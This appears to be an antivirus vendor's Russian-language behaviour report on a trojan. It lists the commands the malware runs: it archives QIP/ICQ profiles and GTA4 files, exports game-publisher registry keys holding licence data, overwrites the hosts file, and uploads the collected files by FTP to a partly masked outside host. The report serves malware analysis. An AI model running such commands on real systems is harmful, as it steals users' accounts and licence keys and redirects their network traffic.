Техническая информация
- %WINDIR%\PKZIP.EXE -add -dir=relative -excl=RcvdFiles -excl=BackupCL -excl=History -excl=Devils -excl=*.nil -excl=*.txt -excl=*cl -excl=*.cli -excl=*.clg -excl=*.clv icq.zip
- %WINDIR%\PKZIP.EXE -add -dir=relative -attr=hidden,system gta4.zip
- <SYSTEM32>\xcopy.exe "<LS_APPDATA>\Microsoft\XLive\gta4.zip" /Y C:\logs\gta4.zip
- <SYSTEM32>\xcopy.exe <LS_APPDATA>\PKZIP.exe /Y %WINDIR%\
- <SYSTEM32>\xcopy.exe "%PROGRAM_FILES%\QIP\Users\icq.zip" /Y C:\logs\icq_xp.zip
- <SYSTEM32>\ftp.exe -s:%TEMP%\sendtoftp.log
- <SYSTEM32>\xcopy.exe "%PROGRAM_FILES% (x86)\QIP\Users\icq.zip" /Y C:\logs\icq_vista.zip
- <SYSTEM32>\reg.exe EXPORT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\ACTIVISION C:\logs\activision_vista.txt
- <SYSTEM32>\reg.exe EXPORT HKEY_LOCAL_MACHINE\SOFTWARE\ACTIVISION C:\logs\activision.txt
- <SYSTEM32>\reg.exe EXPORT HKEY_LOCAL_MACHINE\SOFTWARE\THQ C:\logs\thq.txt
- <SYSTEM32>\xcopy.exe <LS_APPDATA>\hosts.txt /Y <DRIVERS>\etc\hosts
- <SYSTEM32>\reg.exe EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Electronic Arts" C:\logs\ea.txt
- <Текущая директория>\icq.zip
- <Текущая директория>\gta4.zip
- %TEMP%\sendtoftp.log
- <Текущая директория>\PKZ2.tmp
- <LS_APPDATA>\PKZIP.EXE
- %TEMP%\~1.bat
- %WINDIR%\PKZIP.EXE
- <LS_APPDATA>\hosts.txt
- %TEMP%\~1.bat
- <LS_APPDATA>\PKZIP.EXE
- <LS_APPDATA>\hosts.txt
- %TEMP%\~1.bat
- <Текущая директория>\icq.zip
- %TEMP%\sendtoftp.log
- 'ft#.#arod.ru':21
- 'localhost':1035
- DNS ASK ft#.#arod.ru